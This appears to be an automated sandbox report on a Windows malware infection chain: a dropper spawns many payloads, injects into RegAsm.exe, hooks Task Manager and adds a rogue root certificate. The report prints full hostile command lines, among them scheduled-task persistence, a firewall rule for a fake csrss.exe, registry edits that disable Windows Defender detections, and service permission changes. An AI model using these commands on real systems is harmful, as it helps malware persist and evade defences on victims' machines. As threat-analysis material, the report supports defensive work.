0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 1736 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exetrf.exekeks.exerundll32.exepowershell.exepowershell.exejok.exepowershell.exepowershell.exepowershell.exepowershell.exerun.exepowershell.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exepowershell.exepowershell.exemstc.exec60PHerJOpPIJ0qXm2jrdNh4.exepid process 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 2068 chrosha.exe 2068 chrosha.exe 3084 trf.exe 3236 keks.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 3236 keks.exe 3236 keks.exe 3236 keks.exe 3236 keks.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 3620 powershell.exe 3620 powershell.exe 3620 powershell.exe 1984 jok.exe 1984 jok.exe 1984 jok.exe 1984 jok.exe 2632 powershell.exe 2632 powershell.exe 2632 powershell.exe 3100 powershell.exe 3100 powershell.exe 576 powershell.exe 576 powershell.exe 3276 powershell.exe 3276 powershell.exe 576 powershell.exe 3100 powershell.exe 3276 powershell.exe 1240 run.exe 1240 run.exe 1240 run.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 2944 powershell.exe 2944 powershell.exe 2604 powershell.exe 2604 powershell.exe 2944 powershell.exe 2604 powershell.exe 1736 mstc.exe 1736 mstc.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 1240 run.exe 396 cmd.exe 396 cmd.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
trf.exekeks.exemstc.exeinstallutil.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exepowershell.exesc.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 3084 trf.exe Token: SeBackupPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeSecurityPrivilege 3084 trf.exe Token: SeDebugPrivilege 3236 keks.exe Token: SeDebugPrivilege 1736 mstc.exe Token: SeDebugPrivilege 4704 installutil.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeDebugPrivilege 4544 RegAsm.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe Token: SeImpersonatePrivilege 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe Token: SeDebugPrivilege 3324 4odFPgou1NdrXX1AEvintttJ.exe Token: SeImpersonatePrivilege 3324 4odFPgou1NdrXX1AEvintttJ.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 1736 mstc.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeSystemEnvironmentPrivilege 1604 csrss.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeSecurityPrivilege 1352 sc.exe Token: SeSecurityPrivilege 1352 sc.exe Token: SeDebugPrivilege 3532 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 4024 MSBuild.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
u2og.3.exepid process 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u2og.3.exepid process 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe 1572 u2og.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exemstc.exepid process 1240 run.exe 1240 run.exe 1736 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exeRegAsm.exegold.exedescription pid process target process PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe PID 2068 wrote to memory of 1856 2068 chrosha.exe swiiiii.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 1856 wrote to memory of 1716 1856 swiiiii.exe RegAsm.exe PID 2068 wrote to memory of 1568 2068 chrosha.exe alexxxxxxxx.exe PID 2068 wrote to memory of 1568 2068 chrosha.exe alexxxxxxxx.exe PID 2068 wrote to memory of 1568 2068 chrosha.exe alexxxxxxxx.exe PID 1568 wrote to memory of 3252 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 3252 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 3252 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2028 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2028 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2028 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4532 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4532 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4532 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4012 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4012 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4012 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2816 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2816 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 2816 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 5084 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 5084 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 5084 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1568 wrote to memory of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 4544 wrote to memory of 3084 4544 RegAsm.exe trf.exe PID 4544 wrote to memory of 3084 4544 RegAsm.exe trf.exe PID 4544 wrote to memory of 3236 4544 RegAsm.exe keks.exe PID 4544 wrote to memory of 3236 4544 RegAsm.exe keks.exe PID 4544 wrote to memory of 3236 4544 RegAsm.exe keks.exe PID 2068 wrote to memory of 1832 2068 chrosha.exe gold.exe PID 2068 wrote to memory of 1832 2068 chrosha.exe gold.exe PID 2068 wrote to memory of 1832 2068 chrosha.exe gold.exe PID 1832 wrote to memory of 944 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 944 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 944 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 1832 wrote to memory of 2632 1832 gold.exe RegAsm.exe PID 2068 wrote to memory of 2096 2068 chrosha.exe NewB.exe PID 2068 wrote to memory of 2096 2068 chrosha.exe NewB.exe PID 2068 wrote to memory of 2096 2068 chrosha.exe NewB.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe"C:\Users\Admin\AppData\Local\Temp\d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 8923⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 4083⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 4083⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe"C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe"4⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2og.0.exe"C:\Users\Admin\AppData\Local\Temp\u2og.0.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2og.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2og.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\u2og.3.exe"C:\Users\Admin\AppData\Local\Temp\u2og.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 11645⤵
- Program crash
-
C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe"C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe"C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
